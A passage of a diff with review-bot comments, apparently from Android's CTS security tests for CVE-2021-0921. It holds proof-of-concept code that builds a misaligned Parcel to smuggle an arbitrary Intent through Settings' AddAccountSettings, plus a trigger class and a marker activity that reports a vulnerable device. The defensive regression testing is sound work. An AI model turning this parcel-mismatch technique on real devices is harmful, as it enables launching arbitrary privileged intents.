+ data.writeInt(false ? 1 : 0); // overlay -> killAfterRestore
+ data.writeInt(false ? 1 : 0); // isolatedSplitLoading -> restoreAnyVersion
+ data.writeInt(false ? 1 : 0); // hasDomainUrls -> fullBackupOnly
+ data.writeInt(false ? 1 : 0); // profileableByShell -> persistent
+ data.writeInt(false ? 1 : 0); // backupInForeground -> debuggable
+ data.writeInt(false ? 1 : 0); // useEmbeddedDex -> vmSafeMode
+ data.writeInt(false ? 1 : 0); // defaultToDeviceProtectedStorage -> hasCode
+ data.writeInt(false ? 1 : 0); // directBootAware -> allowTaskReparenting
+ data.writeInt(false ? 1 : 0); // partiallyDirectBootAware -> allowClearUserData
+ data.writeInt(false ? 1 : 0); // resizeableActivityViaSdkVersion -> largeHeap
+ data.writeInt(false ? 1 : 0); // allowClearUserDataOnFailedRestore -> usesCleartextTraffic
+ data.writeInt(false ? 1 : 0); // allowAudioPlaybackCapture -> supportsRtl
+ data.writeInt(false ? 1 : 0); // requestLegacyExternalStorage -> testOnly
+ data.writeInt(false ? 1 : 0); // usesNonSdkApi -> multiArch
+ data.writeInt(false ? 1 : 0); // hasFragileUserData -> extractNativeLibs
+ data.writeInt(false ? 1 : 0); // cantSaveState -> game
+ data.writeInt(false ? 1 : 0); // allowNativeHeapPointerTagging -> resizeableActivity
+ data.writeInt(0); // autoRevokePermissions -> staticSharedLibrary
+ data.writeInt(false ? 1 : 0); // preserveLegacyExternalStorage -> overlay
+ data.writeInt(0); // mimeGroups -> isolatedSplitLoading
+ data.writeInt(0); // gwpAsanMode -> hasDomainUrls
+ data.writeInt(0); // minExtensionVersions -> profileableByShell
+
+ data.writeString("key2");
+ data.writeInt(-1);
+
+ data.writeString("key3");
+ data.writeInt(13);
+ int byteArrayLenPos = data.dataPosition();
+ data.writeInt(0);
+ int byteArrayStartPos = data.dataPosition();
+ for (int i = 0; i < 7; i++) {
+ data.writeInt(0);
+ }
+ data.writeString(AccountManager.KEY_INTENT);
+ data.writeInt(4);
+ data.writeString("android.content.Intent");
+ intent.writeToParcel(data, 0);
+ int byteArrayEndPos = data.dataPosition();
+ data.setDataPosition(byteArrayLenPos);
+ int byteArrayLen = byteArrayEndPos - byteArrayStartPos;
+ data.writeInt(byteArrayLen);
+ data.setDataPosition(byteArrayEndPos);
+ int bundleEndPos = data.dataPosition();
+ data.setDataPosition(bundleLenPos);
+ int bundleLen = bundleEndPos - bundleStartPos;
+ data.writeInt(bundleLen);
+ data.setDataPosition(bundleEndPos);
+ Log.d(TAG, "parsingPackageImplParcel() end");
+ return data;
+ }
+}
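Review bot: `parsingPackageImplParcel()` has no documentation and writes bare literals for the wire format: `0x4C444E42` (the Bundle magic, "BNDL") and `4`, `13` and `-1`, which appear to be Parcel value-type tags. Nothing states which platform release's `ParsingPackageImpl` field order the long run of writes mirrors. If that order differs on the device under test, the payload presumably no longer lines up and the test passes without exercising the check, so the class should carry a comment naming the release the layout was taken from and what result to expect elsewhere. Named constants such as `private static final int BUNDLE_MAGIC = 0x4C444E42; // 'B','N','D','L'`, and a plain `0` in place of `false ? 1 : 0`, would make the listing reviewable. The back-patching through `byteArrayLenPos` and `bundleLenPos` at the end deserves a one-line comment each, saying that the length written is end position minus start position.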
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java
new file mode 100644
index 00000000000..5fe3acfc869
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java
@@ -0,0 +1,23 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.content.Context;
+import android.app.Activity;
+
+import android.os.Bundle;
+import android.util.Log;
+import org.junit.Assert;
+
+public class TestActivity extends Activity {
+ private static final String TAG = "TAG_2021_0921.TestActivity";
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ Log.d(TAG, "onCreate() start");
+ Assert.fail("Arbitrary intent executed. Device is vulnerable.");
+ }
+}
+
+
+
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java
new file mode 100644
index 00000000000..987b161766f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java
@@ -0,0 +1,41 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.ApplicationInfo;
+import android.net.Uri;
+import android.util.Log;
+
+import java.io.File;
+
+public class Trigger {
+ private static final String TAG = "TAG_2021_0921.Triggger";
+ private Context mContext;
+
+ public Trigger(Context context) {
+ mContext = context;
+ }
+
+ public void accountSettings() {
+ Log.d(TAG, "accountSettings() start");
+
+ //replaces intent.setAction(Intent.ACTION_REBOOT) in original Poc
+ Intent arbitraryIntent = new Intent(mContext, TestActivity.class);
+
+ //Patched device is not supposed to process that intent
+ Authenticator.mIntent = arbitraryIntent;
+
+ Intent intent = new Intent();
+ intent.setComponent(new ComponentName(
+ "com.android.settings",
+ "com.android.settings.accounts.AddAccountSettings"));
+ intent.setAction(Intent.ACTION_RUN);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ String authTypes[] = {"android.security.cts"};
+
+ intent.putExtra("account_types", authTypes);
+ mContext.startActivity(intent);
+ Log.d(TAG, "accountSettings() end");
+ }
+}
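Review bot: `accountSettings()` calls `mContext.startActivity(intent)` on the hard-coded component `com.android.settings` / `com.android.settings.accounts.AddAccountSettings` without checking that it resolves. On a build where Settings uses a different package or class name, the `ActivityNotFoundException` escapes from `AuthenticatorActivity.onCreate()` and would likely be reported as a failure, i.e. as a vulnerable device. Resolve first with `if (mContext.getPackageManager().resolveActivity(intent, 0) == null) { Log.e(TAG, "AddAccountSettings not found"); return; }` and let the test treat that case as inconclusive. Smaller points: the tag is misspelled (`"TAG_2021_0921.Triggger"`), the imports `ApplicationInfo`, `Uri` and `File` are unused, and `String authTypes[]` is more conventionally written `String[] authTypes`.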